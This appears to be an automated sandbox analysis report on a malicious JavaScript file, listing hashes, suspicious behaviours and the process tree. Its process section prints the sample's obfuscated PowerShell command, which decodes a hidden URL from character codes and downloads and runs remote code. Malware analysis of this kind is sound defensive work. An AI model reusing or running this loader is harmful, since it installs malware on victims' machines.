Analysis
-
max time kernel
508s -
max time network
572s -
platform
windows10-2004_x64 -
resource
win10v2004-20230915-en -
resource tags
arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system -
submitted
24-09-2023 01:24
Static task
static1
Behavioral task
behavioral1
Sample
Notice_5066383.js
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
Notice_5066383.js
Resource
win10-20230915-en
Behavioral task
behavioral3
Sample
Notice_5066383.js
Resource
win10v2004-20230915-en
General
-
Target
Notice_5066383.js
-
Size
487KB
-
MD5
2654dc8542d95f0e31ece8b4135171f4
-
SHA1
1073e5881f32632f7abcf7dfb234328499c3946c
-
SHA256
f48513609d7c4a1538802b58e9d5b3e1a2248170c6518a1da7e3ea003a6b2fbf
-
SHA512
76bc5fab34c59fdba5ab8d5e37fc89cbc15c970f54a85014f2e14307d351f1219bcd81c1a9ab5281153bdaa4c54391fe6359d140ba6e4019b26329e00749a672
-
SSDEEP
3072:KbCLrEna486d8EiBm7mUYn15yu1hOHaoGFtk9dMpBV064I:es
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4224 5072 conhost.exe 85 -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2420 powershell.exe 2420 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2420 powershell.exe -
Suspicious use of WriteProcessMemory 2 IoCs
description pid Process procid_target PID 4224 wrote to memory of 2420 4224 conhost.exe 87 PID 4224 wrote to memory of 2420 4224 conhost.exe 87
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\Notice_5066383.js1⤵PID:1044
-
C:\Windows\system32\conhost.execonhost --headless powershell $gmiqvycdjatu=('grep','add-txt','set-width', 'font-extract'); $rqkcjoyediwh=@(6639,6618,6622,6620,6618,6639,6563,6633,6628,6629,6564,6566,6563,6629,6621,6629,6580,6621,6614,6632,6621,6578);foreach($rob9e in $rqkcjoyediwh){$awi=$rob9e;$eowbuxctdiln=$eowbuxctdiln+[char]($awi-6517)};$gmiqvycdjatu[2]=$eowbuxctdiln; ;$dftezw='rl';$five=1;new-alias zwert cu$dftezw;.$([char](9992-9887)+'ex')(zwert -useb $gmiqvycdjatu[7487-7485])1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4224 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell $gmiqvycdjatu=('grep','add-txt','set-width', 'font-extract'); $rqkcjoyediwh=@(6639,6618,6622,6620,6618,6639,6563,6633,6628,6629,6564,6566,6563,6629,6621,6629,6580,6621,6614,6632,6621,6578);foreach($rob9e in $rqkcjoyediwh){$awi=$rob9e;$eowbuxctdiln=$eowbuxctdiln+[char]($awi-6517)};$gmiqvycdjatu[2]=$eowbuxctdiln; ;$dftezw='rl';$five=1;new-alias zwert cu$dftezw;.$([char](9992-9887)+'ex')(zwert -useb $gmiqvycdjatu[7487-7485])2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2420
-
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82